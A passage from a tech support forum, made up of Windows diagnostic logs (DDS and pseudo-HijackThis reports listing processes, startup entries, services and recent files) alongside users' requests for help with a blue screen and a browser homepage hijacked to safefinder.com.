C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\DbxSvc.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe
C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files (x86)\WinTV\TVServer\CaptureGenPCI.exe
C:\Program Files (x86)\WinTV\TVServer\CaptureGenPCI.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\WUDFHost.exe
C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\System32\svchost.exe -k secsvcs
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskhost.exe
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Program Files\VIA XHCI UASP Utility\usb3Monitor.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Users\Steve\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Users\Steve\AppData\Local\Epic Privacy Browser\Installer\EpicUpdate.exe
C:\Users\Steve\AppData\Roaming\Spotify\SpotifyWebHelper.exe
C:\Program Files\WinZip\FAH\FAHWindow64.exe
C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\acrotray.exe
C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Windows\system32\wuauclt.exe
C:\Program Files (x86)\KeePass\KeePass.exe
C:\Program Files (x86)\Quicken\qw.exe
C:\Program Files (x86)\Quicken\qwSubprocess.exe
C:\Program Files (x86)\Notepad++\notepad++.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
C:\Program Files (x86)\Mozilla Thunderbird\crashreporter.exe
C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler.exe
C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler64.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\taskmgr.exe
C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\taskeng.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
mWinlogon: Userinit = userinit.exe,
BHO: Adobe PDF Reader Link Helper: {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
BHO: ContributeBHO Class: {074C1DC5-9320-4A9A-947D-C042949C6216} - C:\Program Files (x86)\Adobe\/Adobe Contribute CS3/contributeieplugin.dll
BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Adobe PDF Conversion Toolbar Helper: {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
TB: Contribute Toolbar: {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\Adobe\/Adobe Contribute CS3/contributeieplugin.dll
TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
EB: Canon Easy-WebPrint EX: {21347690-EC41-4F9A-8887-1F4AEE672439} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
EB: Adobe PDF: {182EC0BE-5110-49C8-A062-BEB1D02A220B} - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
uRun: [Google Update] C:\Users\Steve\AppData\Local\Google\Update\1.3.32.7\GoogleUpdateCore.exe
uRun: [Google Photos Backup] "C:\Users\Steve\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe" /autostart
uRun: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
uRun: [Epic Privacy Browser Installer] "C:\Users\Steve\AppData\Local\Epic Privacy Browser\Installer\EpicUpdate.exe" /c
uRun: [Spotify Web Helper] "C:\Users\Steve\AppData\Roaming\Spotify\SpotifyWebHelper.exe"
uRun: [Spotify] "C:\Users\Steve\AppData\Roaming\Spotify\Spotify.exe" -autostart -minimized
mRun: [Dropbox] "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
mRun: [GrooveMonitor] "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe"
mRun: [Acrobat Assistant 8.0] "C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe"
mRun: [Adobe_ID0EYTHM] C:\PROGRA~2\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\FAH.lnk - C:\Program Files\WinZip\FAH\FAHConsole.exe
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: Append to existing PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert link target to Adobe PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert link target to existing PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert selected links to Adobe PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert selected links to existing PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert selection to Adobe PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert selection to existing PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert to Adobe PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{11312726-2811-493A-94BF-947DB1908C61} : DHCPNameServer = 172.20.10.1
TCP: Interfaces\{3868A159-2B54-4F78-A3E7-21682EEB7004} : DHCPNameServer = 192.168.1.1
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
x64-BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll
x64-Run: [RTHDVCPL] "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
x64-Run: [VIAxHCUtl] C:\Program Files\VIA XHCI UASP Utility\usb3Monitor
x64-Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
x64-Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
x64-Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
============= SERVICES / DRIVERS ===============
.
R0 amd_sata;amd_sata;C:\Windows\System32\drivers\amd_sata.sys [2015-10-7 82240]
R0 amd_xata;amd_xata;C:\Windows\System32\drivers\amd_xata.sys [2015-10-7 42304]
R1 AppleCharger;AppleCharger;C:\Windows\System32\drivers\AppleCharger.sys [2015-10-7 22240]
R1 eamonm;eamonm;C:\Windows\System32\drivers\eamonm.sys [2015-7-13 255240]
R1 ZAM;ZAM Helper Driver;C:\Windows\System32\drivers\zam64.sys [2016-12-23 203680]
R1 ZAM_Guard;ZAM Guard Driver;C:\Windows\System32\drivers\zamguard64.sys [2016-12-23 203680]
R2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2015-10-7 77104]
R2 DbxSvc;DbxSvc;C:\Windows\System32\DbxSvc.exe [2016-12-21 42096]
R2 DiagTrack;Diagnostics Tracking Service;C:\Windows\System32\svchost.exe -k utcsvc [2009-7-13 27136]
R2 ekrn;ESET Service;C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [2015-7-8 1353720]
R2 epfwwfpr;epfwwfpr;C:\Windows\System32\drivers\epfwwfpr.sys [2015-7-13 168208]
R2 HauppaugeTVServer;HauppaugeTVServer;C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe [2015-10-8 586872]
R2 IntuitUpdateServiceV4;Intuit Update Service v4;C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe [2015-4-27 14624]
R2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2015-10-7 410744]
R3 hcw89;hcw89 service;C:\Windows\System32\drivers\hcw89.sys [2015-10-8 1771904]
R3 LEqdUsb;Logitech SetPoint Unifying KMDF USB Filter;C:\Windows\System32\drivers\LEqdUsb.sys [2009-6-17 74256]
R3 LHidEqd;Logitech SetPoint Unifying KMDF HID Filter;C:\Windows\System32\drivers\LHidEqd.sys [2009-6-17 13328]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2015-10-7 941272]
R3 usbfilter;AMD USB Filter Driver;C:\Windows\System32\drivers\usbfilter.sys [2015-10-7 58536]
R3 VUSB3HUB;VIA USB 3 Root Hub Service;C:\Windows\System32\drivers\ViaHub3.sys [2015-10-7 225792]
R3 xhcdrv;VIA USB eXtensible Host Controller Service;C:\Windows\System32\drivers\xhcdrv.sys [2015-10-7 305664]
S1 UsbCharger;UsbCharger;C:\Windows\System32\drivers\UsbCharger.sys [2015-10-7 22240]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2016-11-29 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2016-11-29 125112]
S2 dbupdate;Dropbox Update Service (dbupdate);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-10-7 143144]
S3 AppleChargerSrv;AppleChargerSrv;system32\AppleChargerSrv.exe --> system32\AppleChargerSrv.exe [?]
S3 dbupdatem;Dropbox Update Service (dbupdatem);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-10-7 143144]
S3 HTCAND64;HTC Device Driver;C:\Windows\System32\drivers\ANDROIDUSB.sys [2009-11-2 33736]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2016-12-14 114688]
S3 Netaapl;Apple Mobile Device Ethernet Service;C:\Windows\System32\drivers\netaapl64.sys [2014-8-15 23040]
S3 StorSvc;Storage Service;C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-13 27136]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2015-10-7 59392]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2015-6-17 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2015-10-8 1255736]
S3 WDC_SAM;WD SCSI Pass Thru driver;C:\Windows\System32\drivers\wdcsam64.sys [2015-4-29 23200]
.
=============== File Associations ===============
.
ShellExec: dreamweaver.exe: Open="C:\Program Files (x86)\Adobe\Adobe Dreamweaver CS3\dreamweaver.exe", "%1"
.
=============== Created Last 30 ================
.
2017-01-06 10:56:59 75888 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{BDDBA143-EEC9-467C-8A44-FE517CB966FF}\offreg.1244.dll
2017-01-06 10:56:07 11781064 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{BDDBA143-EEC9-467C-8A44-FE517CB966FF}\mpengine.dll
2016-12-24 03:25:57 203680 ----a-w- C:\Windows\System32\drivers\zamguard64.sys
2016-12-24 03:25:57 203680 ----a-w- C:\Windows\System32\drivers\zam64.sys
2016-12-24 03:25:56 -------- d-----w- C:\Users\Steve\AppData\Local\Zemana
2016-12-24 03:16:27 -------- d-----w- C:\ProgramData\HitmanPro
2016-12-21 18:15:36 75888 ----a-w- C:\Windows\System32\drivers\dbx-stable.sys
2016-12-21 18:15:36 75888 ----a-w- C:\Windows\System32\drivers\dbx-dev.sys
2016-12-21 18:15:36 75888 ----a-w- C:\Windows\System32\drivers\dbx-canary.sys
2016-12-21 18:15:36 42096 ----a-w- C:\Windows\System32\DbxSvc.exe
.
==================== Find3M ====================
.
2016-12-14 09:00:14 802904 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2016-12-14 09:00:14 144472 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2016-11-30 03:34:16 28352 ----a-w- C:\Windows\SysWow64\aspnet_counters.dll
2016-11-30 03:34:16 19112 ----a-w- C:\Windows\SysWow64\msvcr110_clr0400.dll
2016-11-30 03:34:16 19112 ----a-w- C:\Windows\SysWow64\msvcr100_clr0400.dll
2016-11-30 03:34:16 19112 ----a-w- C:\Windows\SysWow64\msvcp110_clr0400.dll
2016-11-30 03:27:48 30400 ----a-w- C:\Windows\System32\aspnet_counters.dll
2016-11-30 03:27:48 19112 ----a-w- C:\Windows\System32\msvcr110_clr0400.dll
2016-11-30 03:27:48 19112 ----a-w- C:\Windows\System32\msvcr100_clr0400.dll
2016-11-30 03:27:48 19112 ----a-w- C:\Windows\System32\msvcp110_clr0400.dll
2016-11-21 18:16:29 95464 ----a-w- C:\Windows\System32\drivers\ksecdd.sys
2016-11-21 18:16:29 154856 ----a-w- C:\Windows\System32\drivers\ksecpkg.sys
2016-11-20 16:20:03 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
2016-11-20 16:20:03 82944 ----a-w- C:\Windows\SysWow64\bcrypt.dll
2016-11-20 16:20:03 666112 ----a-w- C:\Windows\SysWow64\rpcrt4.dll
2016-11-20 16:20:01 65536 ----a-w- C:\Windows\SysWow64\TSpkg.dll
2016-11-20 16:20:01 172032 ----a-w- C:\Windows\SysWow64\wdigest.dll
2016-11-20 16:19:57 254464 ----a-w- C:\Windows\SysWow64\schannel.dll
2016-11-20 16:19:57 22016 ----a-w- C:\Windows\SysWow64\secur32.dll
2016-11-20 16:19:57 141312 ----a-w- C:\Windows\SysWow64\rpchttp.dll
2016-11-20 16:19:53 261120 ----a-w- C:\Windows\SysWow64\msv1_0.dll
2016-11-20 16:19:53 223232 ----a-w- C:\Windows\SysWow64\ncrypt.dll
2016-11-20 16:19:52 60416 ----a-w- C:\Windows\SysWow64\msobjs.dll
2016-11-20 16:19:51 146432 ----a-w- C:\Windows\SysWow64\msaudite.dll
2016-11-20 16:19:49 553472 ----a-w- C:\Windows\SysWow64\kerberos.dll
2016-11-20 16:19:47 84992 ----a-w- C:\Windows\SysWow64\hlink.dll
2016-11-20 16:19:43 17408 ----a-w- C:\Windows\SysWow64\credssp.dll
2016-11-20 16:19:42 342528 ----a-w- C:\Windows\SysWow64\certcli.dll
2016-11-20 16:19:40 690688 ----a-w- C:\Windows\SysWow64\adtschema.dll
2016-11-20 16:04:54 64000 ----a-w- C:\Windows\System32\auditpol.exe
2016-11-20 15:58:19 159744 ----a-w- C:\Windows\System32\drivers\mrxsmb.sys
2016-11-20 15:57:45 291328 ----a-w- C:\Windows\System32\drivers\mrxsmb10.sys
2016-11-20 15:57:43 129536 ----a-w- C:\Windows\System32\drivers\mrxsmb20.sys
2016-11-20 15:57:01 30720 ----a-w- C:\Windows\System32\lsass.exe
2016-11-20 15:57:00 50176 ----a-w- C:\Windows\SysWow64\auditpol.exe
2016-11-20 15:52:42 36352 ----a-w- C:\Windows\SysWow64\cryptbase.dll
2016-11-20 14:07:52 467392 ----a-w- C:\Windows\System32\drivers\cng.sys
2016-11-17 16:41:49 370920 ----a-w- C:\Windows\System32\clfs.sys
2016-11-12 19:48:25 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2016-11-12 19:48:08 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2016-11-12 19:28:01 66560 ----a-w- C:\Windows\System32\iesetup.dll
2016-11-12 19:26:46 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2016-11-12 19:26:27 417792 ----a-w- C:\Windows\System32\html.iec
2016-11-12 19:25:50 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2016-11-12 19:25:41 576000 ----a-w- C:\Windows\System32\vbscript.dll
2016-11-12 19:08:26 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2016-11-12 19:08:24 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2016-11-12 19:07:47 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2016-11-12 18:56:20 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2016-11-12 18:53:10 6049280 ----a-w- C:\Windows\System32\jscript9.dll
2016-11-12 18:47:35 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2016-11-12 18:41:49 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2016-11-12 18:30:22 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2016-11-12 18:29:26 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2016-11-12 18:29:13 498688 ----a-w- C:\Windows\SysWow64\vbscript.dll
2016-11-12 18:29:05 341504 ----a-w- C:\Windows\SysWow64\html.iec
2016-11-12 18:27:51 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2016-11-12 18:14:53 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2016-11-12 18:14:16 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2016-11-12 18:08:54 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2016-11-12 18:08:32 2131456 ----a-w- C:\Windows\System32\inetcpl.cpl
2016-11-12 17:57:35 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2016-11-12 17:37:20 4608000 ----a-w- C:\Windows\SysWow64\jscript9.dll
2016-11-12 17:36:39 2055680 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2016-11-12 17:36:13 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2016-11-12 17:35:33 2920960 ----a-w- C:\Windows\System32\wininet.dll
2016-11-12 17:05:59 2444800 ----a-w- C:\Windows\SysWow64\wininet.dll
2016-11-10 16:32:41 1009152 ----a-w- C:\Windows\System32\user32.dll
2016-11-10 16:19:40 833024 ----a-w- C:\Windows\SysWow64\user32.dll
2016-11-09 16:41:27 114408 ----a-w- C:\Windows\System32\consent.exe
2016-11-09 16:33:43 2048 ----a-w- C:\Windows\System32\tzres.dll
2016-11-09 16:33:34 504320 ----a-w- C:\Windows\System32\msihnd.dll
2016-11-09 16:33:34 3244032 ----a-w- C:\Windows\System32\msi.dll
2016-11-09 16:33:34 25088 ----a-w- C:\Windows\System32\msimsg.dll
2016-11-09 16:33:26 70144 ----a-w- C:\Windows\System32\appinfo.dll
2016-11-09 16:33:26 1941504 ----a-w- C:\Windows\System32\authui.dll
2016-11-09 16:17:52 2048 ----a-w- C:\Windows\SysWow64\tzres.dll
2016-11-09 16:17:31 337408 ----a-w- C:\Windows\SysWow64\msihnd.dll
2016-11-09 16:17:31 25088 ----a-w- C:\Windows\SysWow64\msimsg.dll
2016-11-09 16:17:31 2365440 ----a-w- C:\Windows\SysWow64\msi.dll
2016-11-09 16:17:18 1806848 ----a-w- C:\Windows\SysWow64\authui.dll
2016-11-09 16:02:19 128512 ----a-w- C:\Windows\System32\msiexec.exe
2016-11-09 15:55:06 73216 ----a-w- C:\Windows\SysWow64\msiexec.exe
2016-11-06 16:33:24 404992 ----a-w- C:\Windows\System32\gdi32.dll
2016-11-06 16:16:46 312832 ----a-w- C:\Windows\SysWow64\gdi32.dll
2016-11-06 16:01:47 3219456 ----a-w- C:\Windows\System32\win32k.sys
2016-11-02 15:36:15 382696 ----a-w- C:\Windows\System32\atmfd.dll
2016-11-02 15:32:08 41472 ----a-w- C:\Windows\System32\lpk.dll
2016-11-02 15:32:05 100864 ----a-w- C:\Windows\System32\fontsub.dll
2016-11-02 15:32:03 14336 ----a-w- C:\Windows\System32\dciman32.dll
2016-11-02 15:32:01 46080 ----a-w- C:\Windows\System32\atmlib.dll
2016-11-02 15:22:36 308456 ----a-w- C:\Windows\SysWow64\atmfd.dll
2016-11-02 15:16:31 25600 ----a-w- C:\Windows\SysWow64\lpk.dll
2016-11-02 15:16:15 70656 ----a-w- C:\Windows\SysWow64\fontsub.dll
2016-11-02 15:16:14 10240 ----a-w- C:\Windows\SysWow64\dciman32.dll
2016-11-02 14:53:37 34304 ----a-w- C:\Windows\SysWow64\atmlib.dll
2016-10-27 15:33:31 802304 ----a-w- C:\Windows\System32\usp10.dll
2016-10-27 15:20:17 627712 ----a-w- C:\Windows\SysWow64\usp10.dll
2016-10-26 21:29:06 485032 ------w- C:\Windows\System32\MpSigStub.exe
2016-10-15 15:31:21 976896 ----a-w- C:\Windows\System32\inetcomm.dll
.
============= FINISH: 12:30:33.26 ===============

Attached Files
File Type: txt attach.txt (11.4 KB)

Windows Blue Screen

Hello,

Welcome everybody

I would really appreciate some help:

I have a blue screen that appears saying the PC ran into a problem and needs to restart, with windows.com/stopcode for more information.

I am running a Windows 10 32-bit system (Windows 10 from the free upgrade last year).

Thank you for taking the time to read my post

Kind Regards
Tania

Malware/Spyware on my computer

Hello Tech Support Forum,

I had loaned my computer to my nephew yesterday... and it looks like he may have mistakenly clicked on a malware/spyware program, which has changed my homepage to safefinder.com.

Below is the dds.txt results and the attach.txt is attached.

I hope that you can help me.

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.14393.0 BrowserJavaVersion: 11.111.2
Run by King at 11:51:41 on 2017-01-08
Microsoft Windows 10 Pro 10.0.14393.0.1252.1.1033.18.7888.4834 [GMT -5:00]
.
AV: Kaspersky Total Security *Enabled/Updated* {86367591-4BE4-AE08-2FD9-7FCB8259CD98}
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Kaspersky Total Security *Enabled/Updated* {3D579475-6DDE-A186-1569-44B9F9DE8725}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Kaspersky Total Security *Enabled* {BE0DF4B4-018B-AF50-0486-D6FE7C8A8AE3}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\System32\WUDFHost.exe
C:\WINDOWS\system32\dashost.exe
C:\WINDOWS\system32\ibmpmsvc.exe
C:\WINDOWS\system32\igfxCUIService.exe
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\AUDIODG.EXE
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\WINDOWS\system32\DbxSvc.exe
C:\WINDOWS\system32\BtwRSupportService.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avp.exe
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\WINDOWS\system32\svchost.exe -k apphost
C:\ProgramData\Logic Handler\set.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\EMSService.exe
C:\WINDOWS\SysWoW64\svchost.exe -k hpdevmgmt
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files\Lenovo\Communications Utility\CAMMUTE.exe
C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
C:\Program Files\Lenovo\Communications Utility\vcamsvc.exe
C:\Program Files\LENOVO\VIRTSCRL\lvvsst.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\WINDOWS\system32\mqsvc.exe
C:\WINDOWS\system32\svchost.exe -k iissvcs
C:\Windows\SysWOW64\NLSSRV32.EXE
C:\ProgramData\NetworkPacketManitor\Nettrans.exe
C:\WINDOWS\SysWoW64\NetUtils2016.exe
C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe
